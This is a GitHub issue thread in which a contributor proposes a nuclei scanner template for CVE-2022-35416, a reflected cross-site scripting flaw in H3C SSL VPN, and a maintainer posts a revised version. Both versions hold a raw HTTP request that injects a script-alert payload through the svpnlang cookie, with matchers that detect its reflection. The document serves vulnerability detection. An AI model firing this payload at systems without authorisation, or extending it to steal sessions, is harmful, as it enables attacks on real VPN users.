### ISSUE TITLE
CVE-2022-35416-H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 - Cross-Site Scripting

### ISSUE THREAD

**Issue by shelu16** [projectdiscovery/nuclei-templates#4822]
Hi Please add this template 

H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 - Cross-Site Scripting

id: CVE-2022-35416

info:
  name: H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 - Cross-Site Scripting
  author: 0x240x23elu
  severity: medium
  reference:
    - https://github.com/safe3s/CVE-2022-35416,shodan search  http.html_hash:510586239
  tags: H3C,xss

requests:
  - raw:
      - |
        GET /wnm/login/login.json HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Cookie: svpnlang=<script>alert('XSS')</script>

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert('XSS')</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header

![image](https://user-images.githubusercontent.com/30596083/178755066-33c95a11-b31c-427d-a29c-eaf8ccda4008.png)

**Comment by DhiyaneshGeek** [comment]
```yaml
id: CVE-2022-35416

info:
  name: H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang cookie
    XSS.
  author: 0x240x23elu
  severity: medium
  description: H3C SSL VPN through 2022-07-10 allows wnm/login/login.json svpnlang
    cookie XSS.
  tags: cve,cve2022,xss

requests:
  - raw:
      - |
        GET /wnm/login/login.json HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
        Cookie: svpnlang=<script>alert('document.domain')</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <script>alert('document.domain')</script>

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html
```

@shelu16 Thanks for amazing template :)
